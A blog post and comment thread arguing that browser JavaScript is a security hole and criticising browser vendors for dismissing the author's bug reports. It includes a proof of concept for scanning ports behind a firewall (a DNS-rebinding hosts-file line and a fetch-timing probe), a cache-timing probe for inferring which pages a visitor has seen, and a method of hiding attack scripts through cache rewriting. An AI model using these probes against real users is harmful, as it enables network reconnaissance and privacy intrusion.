
The Meltdown of the Web.

Giacomo Tesio ・ 4 min read

As Bruce Perens recently put it, I'm "just a programmer".

A humble programmer. And a self-taught one.

A programmer that has learned how to program from a weird group of people whose core value is curiosity: the hackers.

So when I see a security hole affecting billions of people in various ways, I behave like a programmer: I try to fix it... or get it fixed. As soon as possible.

So a month ago, I wrote an article explaining how the Web is still a DARPA weapon (one that sometimes backfires, as Russiagate shows).

There I described two dangerous flaws of the Internet and the Web.

Once I realized that most security experts didn't understand the severity of the issue, I talked about it with a Mozilla developer, who suggested opening an issue with Mozilla.

Thus I spent two hours writing a detailed bug report, but it was soon closed (without saying whether Firefox users are vulnerable to such attacks or not), because

Bugzilla is not a discussion forum.

On the suggested Lobste.rs thread (cached here), I asked (several times) whether Firefox users are vulnerable to such a wide class of attacks, without getting a response.

Instead I got several sarcastic, condescending and even insulting comments.

Still, no response to such a simple question. Are Firefox users vulnerable?

When I reported the same issue to Chromium team, it was closed in less than ten minutes with the same tone:

Filing a bug here isn't the way to change web standards no matter how you feel about them.

It is worth noticing here that both Mozilla and Google are WHATWG members: they write the very Living Standards we are talking about. Living Standards that basically follow the implementations.

The way I see it, this means that you have to fix the implementations to fix the standard... but remember, I'm just a programmer!

Now, I think I've been very clear about the wide class of attacks that JavaScript opens. When asked to, I even carefully explained how simple it is to fix them.

But since

this is the Web functioning as designed

I want you to see what the Web is designed for.

PoC of one of the many possible exploits (bypassing corporate firewalls)

Please add a temporary line to your hosts file (C:\Windows\System32\drivers\etc\hosts on Windows, /etc/hosts elsewhere) containing

127.0.0.1 local.jsfiddle.net

This mimics the attacker controlling your DNS.

Then try this simple JSFiddle with a WHATWG browser.

You can change the port number at line 21 to test for any port on your PC.

You can change the IP in the hosts file to probe other machines on your LAN.

JSFiddle (the fictional attacker) has just bypassed your corporate firewall/proxy.
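The probe itself takes only a few lines of browser JavaScript. Here is a minimal sketch of the idea (the function names and the 50 ms threshold are mine, for illustration, not the actual JSFiddle code):

```javascript
// Classify a port from how long the request took to fail: a refused
// connection errors almost instantly, while an open or filtered port
// answers or hangs. The 50 ms threshold is purely illustrative.
function classifyPort(elapsedMs, refusedBelowMs = 50) {
  return elapsedMs < refusedBelowMs ? "closed" : "open-or-filtered";
}

// Probe one port on the host that local.jsfiddle.net resolves to.
// mode: "no-cors" lets the request leave even though the response
// body stays unreadable; only the elapsed time matters.
async function probe(host, port) {
  const start = Date.now();
  try {
    await fetch(`http://${host}:${port}/`, { mode: "no-cors" });
  } catch (_) {
    // network errors are expected and carry the timing signal
  }
  return classifyPort(Date.now() - start);
}
```

Loop `probe("local.jsfiddle.net", p)` over the ports you care about, and the page has scanned a machine behind the firewall.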

Everything is broken.

This is just one of the countless attacks you can mount this way.

I could go on for hours inventing more attacks. And you should be able to as well.

EDIT: here you can find another exploit

As explained in the bug report, you can target a specific person or group.

Even over a CDN (that is, through a third-party site that the victim trusts).

And then you can reload a harmless script from the same URL, rewriting the cached copy and removing all evidence of the attack.
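To make that cache-rewriting step concrete, here is a sketch of the two responses such a server could send (headers are illustrative, not captured from a real attack):

```
# first response, served only to the targeted victim
HTTP/1.1 200 OK
Content-Type: application/javascript
Cache-Control: no-store

# every subsequent request (and any auditor) gets the harmless copy,
# cached aggressively so it becomes the only version anyone ever sees
HTTP/1.1 200 OK
Content-Type: application/javascript
Cache-Control: public, max-age=31536000
```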

It's really just a matter of competence and imagination.

Still I'm not going to find a cool name or draw puppets to "evangelize" about it. I'm a programmer, not a clown.

How can we fix it?

As I explained in the bug report, the technical solution is basically to

  • make users opt in to program execution on a per-website basis
  • treat such programs as potentially dangerous

You can read a simple recap with details here.
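For what it's worth, the machinery for the first point already exists: Chromium's enterprise policies can block JavaScript by default and allow it per site (the example site is mine; the value 2 means "do not allow"):

```json
{
  "DefaultJavaScriptSetting": 2,
  "JavaScriptAllowedForUrls": ["https://example.com"]
}
```

What is missing is not the mechanism but a first-class UI for ordinary users.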

However, what you can see here is how deeply the Web is broken.

This is not (just) about JavaScript.

This is about people.


Discussion

 
[deleted]
 

what you're doing is boiling the whole web ecosystem down to a single aspect, and then being rather aggressive with people who aren't.

Aggressive? Honestly, I do not think so.

The attack here is a quick and dirty hack that doesn't even work against all private networks, but it shows pretty well what is at stake.

And it's really just one of the possible attacks!

There are billions of users who would get what would feel to them like a broken web, because of an issue that will most likely never affect them.

It all depends on how good the UI is.

Many react to these solutions as if I were suggesting leaving the UI unchanged. AFAIK, no standard dictates that you have to edit about:config to disable JavaScript.

And yet the UI to opt out of JavaScript is worse than the worst GDPR-compliance attempts I've seen so far. This is not a UI design error. This is a deliberate choice.

It turns out that this choice amounts to a sort of "insecurity through obscurity": most people are forced to execute code controlled by strangers because they do not know how to avoid it, AND because you cannot disable it on a website you do not trust while allowing it on one you trust.

it's not even that useful to make it opt-in, since if 99.999% of pages will give you a pop-up to opt-in, people will just learn to click it without hesitation?

You largely overestimate the amount of the Web that truly needs JavaScript.

The simple fact that people would have to opt in to JavaScript would drastically reduce the number of sites that use it. Web developers would start testing the web without JavaScript too, CSS and HTML would progress faster than they currently do, and we would have an overall faster and safer web.

Just like the GDPR, opt-in JavaScript would improve the quality of the Web.

Because a lot of people who now have NO CHOICE but to run JS would have a choice.

Any software that gets a sizable user base becomes hard to maintain, because no issue is ever just a programming issue.

After 20 years in the field, I think I got it pretty well. ;-)

But whenever I made an error (even an expensive one, in the early design phase) that opened a serious vulnerability for my users, I had to fix it as soon as possible. And frankly, when asked about an issue by a customer, I have always explained it clearly, with ALL its implications. I can assure you that it has never been pleasant. But it was the ONLY thing to do.

Here Mozilla is not even saying if their users are vulnerable to this whole class of attacks.

This is the problem that, IMHO, breaks the Web.

Mozilla claims to care about user privacy. People trust them.

Calling people who do that work "clowns" is just disrespectful.

Good point. You are right.

Maybe after being called a "troll" and "absurd" by people who don't seem to understand the issue, I got a bit... "annoyed". I sincerely apologize.

Yet, I really do think that we should NOT need PR to get a severe vulnerability fixed. That's a bad sign for our entire field.

 
[deleted]

Very interesting.

Let me clarify: I think it is ridiculous (for software engineering as a whole) that we need marketing or propaganda to get a bug like Heartbleed fixed. And it's even more ridiculous because it doesn't work, or... maybe... did you get a repaired processor for free?

If you didn't, you are right and I sincerely apologize to all professional clowns for comparing them to the state of our field! They are artists! They make us laugh... on purpose!

I didn't mention JS-blocking extensions (e.g. NoScript) to avoid asking you to read the bug report more carefully. Since you insist... please read the bug report more carefully. AFAIK they wouldn't prevent these attacks unless you totally disable JavaScript everywhere. Remember, the JavaScript can be "customized" after gaining your trust!

Also, installing such extensions assumes you already understand the risks (risks that browser vendors have so far not admitted), while most people do not understand them. As programmers, it's up to us to build secure software, just as it's up to civil engineers to build safe bridges.

The same goes for HTTPS: anyone can buy a certificate, these attacks leave no evidence, and they can target a single specific person among the thousands of users of a website.

Now... are you going to pretend that my sarcasm here can justify the silence of Mozilla?

And honestly, I still can't see how this affects people who aren't attacked by actors with massive resources [...]

If you can't think of cheap attacks, please trust me: there's no need for massive resources.

All you need is to attract the victim on a website you control.

But even if you were right about this (and you are not), you should also consider another important aspect of this vulnerability: if you were an actual criminal you could use the mere existence of these undetectable attacks to gain plausible deniability.

Even if these attacks were "only" putting users' privacy at risk (and they are not), this is something no legal system can allow.

[deleted]

Caught! :-D

Now that you have called me "arrogant", you could consider going back to the bug reports I wrote and to the related Lobste.rs thread, and counting how many dismissive, condescending and insulting responses I got. Try to count how many times it was said that I was trolling, how many times it was said that I was absurd or bizarre.

Compare them with my responses.

Have I ever called anyone a troll? Absurd? Bizarre?

Even in my responses to Frederik Braun, who opened with "Okay, I'll bite." and later explained to me what "Turing complete" means, I just kept asking a single question: are Firefox users vulnerable to such attacks?

That's because all I care about are the people that can be damaged by these attacks.

I find it disturbing that a programmer like me doesn't have the balls to answer such an important question, one that affects millions of people.

Thus, sorry for my previous comment. Really.

It was intentionally abrasive just to make you understand a little how I feel.

 

The attack here is a quick and dirty hack that doesn't even work against all private networks, but it shows pretty well what is at stake.

And it's really just one of the possible attacks!

Can you provide a proof-of-concept? I read the linked articles but I'm unable to follow your logic.

You can find a quick & dirty PoC here
(very quick, it took a few minutes to write)
It shows how to discover the TCP ports open on your PC despite it being behind a firewall and a proxy. It was rapidly tested on a few networks (professionally configured by senior sysadmins) and it worked fine, but it doesn't work everywhere.

Rain1 has built a nicer exploit that leaks your private network topology here.

With a similar timing attack against the cache, you can discover whether a user visited a certain third-party page, deducing their sexual tastes or political orientation despite CORS, sandboxing and all the other measures that Mozilla set up to "protect users' privacy".
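A sketch of that cache probe (the resource URL, helper names and threshold are illustrative):

```javascript
// A warm cache answers in a few milliseconds; a cold fetch costs a
// full network round-trip. The 20 ms threshold is illustrative and
// would need tuning against the victim's connection.
function looksCached(elapsedMs, thresholdMs = 20) {
  return elapsedMs < thresholdMs;
}

// Time how long a resource unique to the third-party page takes to
// load, e.g. an image only served to visitors of that page.
function timeResource(url) {
  return new Promise((resolve) => {
    const img = new Image();
    const start = performance.now();
    img.onload = img.onerror = () => resolve(performance.now() - start);
    img.src = url;
  });
}
```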

The problem is that the number of exploits is potentially unbounded; it would take too much time to write them all. But if you know a little about web development, it's pretty fun to invent new ones!
Just please, add them to the bug report for future reference.

And remember: the website or CDN can serve this malicious JS to a single person and then override it thanks to Cache-Control, leaving no evidence of the attack.

The best security door cannot protect a house without walls.

Ok, it seems that we have different understandings of the terms attack and exploit.

First PoC: Updating my /etc/hosts to allow a bad script to do bad things? Nope.

Second PoC: Just did not get it working.

Yes, there were several cases in the past: getting the link color of visited links in CSS, using CSS3 transparency to get your Facebook profile name... just to name a few.

All of them were handled as serious bugs and got fixed fast.

So, if you have a bug and you can demonstrate it, nice. If you want to discuss things, then I guess here is the right place.

After writing this: I still have a different opinion on this topic and think it's wrong to blame Mozilla. They have often proved in the past that they value privacy and security.

First PoC: Updating my /etc/hosts to allow a bad script to do bad things? Nope.

Yes, we have very different understandings of network security.

Do you know what DNS rebinding is?

I hope Mozilla does.
Actually, I hope Mozilla developers can deduce at least all the attacks I can conceive of from the description I wrote in the bug report.
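For readers who don't: the hosts-file line in the PoC stands in for a DNS server the attacker controls, which with a zero TTL can answer differently on each lookup (addresses illustrative):

```
; answers from the attacker's nameserver for local.jsfiddle.net (TTL 0)
1st lookup -> 203.0.113.10   ; attacker's own server: delivers the page and its JS
2nd lookup -> 127.0.0.1      ; the victim's machine: later fetches go inside the firewall
```

The browser still believes both answers belong to the same origin, which is exactly what the same-origin policy was supposed to prevent.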

Second PoC: Just did not get it working.

The fact that it does not work on your specific machine/network doesn't mean much.

It's a proof-of-concept. It works. Tweak it a little.

Rain1 even explained carefully how it works.

After writing this: I still have a different opinion on this topic and think it's wrong to blame Mozilla. They have often proved in the past that they value privacy and security.

As I wrote in the thread suggested by Mozilla to discuss the issue (now censored on Lobste.rs), I used to trust them too.

But I do not trust them anymore. That's just empty marketing.

To prove me wrong, to prove they deserve the trust of their users, there's just one thing they have to do: tell everybody the answer to this question:

Are Firefox users vulnerable to the wide class of attacks described in that bug report?

People deserve the same answer from Google, Microsoft and Apple, but at least they do not blather about caring for users' privacy.

This exact vulnerability is why we try to get Freenet users to use Freenet as a proxy with a random local IP (127.x.y.z) and port.

That way an attacker needs roughly 200 billion requests on average to find the local service (using only ports 5001..32000, because they are sure not to be ephemeral).
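A quick back-of-the-envelope check of that figure:

```javascript
// 127.x.y.z gives 256^3 loopback addresses, ports 5001..32000 give
// 27000 choices, and on average the attacker finds the hidden
// service after scanning half of the combined space.
const addresses = 256 ** 3;          // 16,777,216 loopback IPs
const ports = 32000 - 5001 + 1;      // 27,000 non-ephemeral ports
const averageTries = (addresses * ports) / 2;
console.log(averageTries);           // 226492416000, i.e. ~2.3e11, "roughly 200 billion"
```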

See d6.gnutella2.info/freenet/USK@sUm3...

 

I think linking to your long article (which mixes in other non-bug-specific content) is a bad start for a bug report. It is rather difficult, at least for me, to follow your argument while it is weaved between seemingly related paragraphs. The article also does not contain the "Steps to reproduce", unlike your PoC in this dev.to article. It would be nicer to provide the PoC, or some other way to reproduce the bug, for others to hunt it.

When dealing with a CDN, I believe a subresource integrity attribute can prevent backstabbing by CDN providers, as the script's integrity is checked by the browser before execution. As for the DNS exploit, HTTPS should be a good measure against man-in-the-middle attacks, hindering swapping or tampering of scripts (Firefox and Chrome address this well). The DNS problem mostly falls to ISPs and regulation of them; browsers have little power here.
I'm also a humble programmer, please correct me if I'm wrong.🤝
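For reference, the integrity check I mean looks like this (the URL and hash are placeholders):

```html
<!-- The browser hashes the fetched file and refuses to execute it
     if the digest does not match the integrity attribute. -->
<script src="https://cdn.example.com/lib.min.js"
        integrity="sha384-...base64-digest-of-the-expected-file..."
        crossorigin="anonymous"></script>
```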

 

Good objections. Let me widen the perspective to explain my reasoning.

Technology is the continuation of Politics by other means.

(a full explanation would take a whole article about hackers' ethics, curiosity, humanity and love...)

To my eyes, the original Medium post describes a few legal and geopolitical issues that are at least as dreadful as the attack you see here. I thought it was important for Mozilla developers to read them, to understand what a dangerous threat JavaScript is outside the US, not just to users' privacy and security but to free speech.

The Medium article itself was not written for programmers but for laymen. Yet the JavaScript attacks were described with enough detail to make a competent web developer aware of the risks. At least that was my intention.

There are too many PoCs to write

I described the bug as "Arbitrary Remote Code Execution" because I cannot stop thinking of more ways these bugs can be exploited against people and companies. I do not know if there is a better InfoSec term that matches these attacks, but I was unable to find one.

I couldn't write the "Steps to reproduce" because there are too many ways to exploit JavaScript. And if I had the time to write every PoC, I would rather use it to strip JavaScript from Firefox. Even worse: WHATWG members would try to stack patch over patch to block each single exploit, without fixing the core issue.

Actually, a smart guy had to convince me to write a PoC at all, since I considered it a waste of time. If the people who closed these issues at Mozilla and Google were unable to foresee these exploits from the description I wrote, we have a huge problem. But I think they actually understood the issue pretty well; they just don't want to fix it, or don't care to, despite the risks for their users.

CDN and SRI

Sure, they can be used to mitigate the risks. But they are not enough, and they should be mandatory.

DNS

As far as I know, the DNS roots have already been the target of several successful DDoS attacks.

I do not like DNS-over-HTTPS for several reasons, but

  • the attack here would work anyway (even CloudFlare would have to resolve local.jsfiddle.net and the compromised DNS would return 127.0.0.1)
  • the US attack described on Medium is made even more powerful: there are 13 DNS roots, there is only one CloudFlare
 

I was reading your post, and I had to sign up just to agree with you, and to say <3 the von Clausewitz para-quote.
I hadn't tried Jehanne (more of a 9ants zealot :P) but will have to try it now... well, tomorrow.

 

The web is broken because it is a half-hearted, incomplete implementation of Xanadu.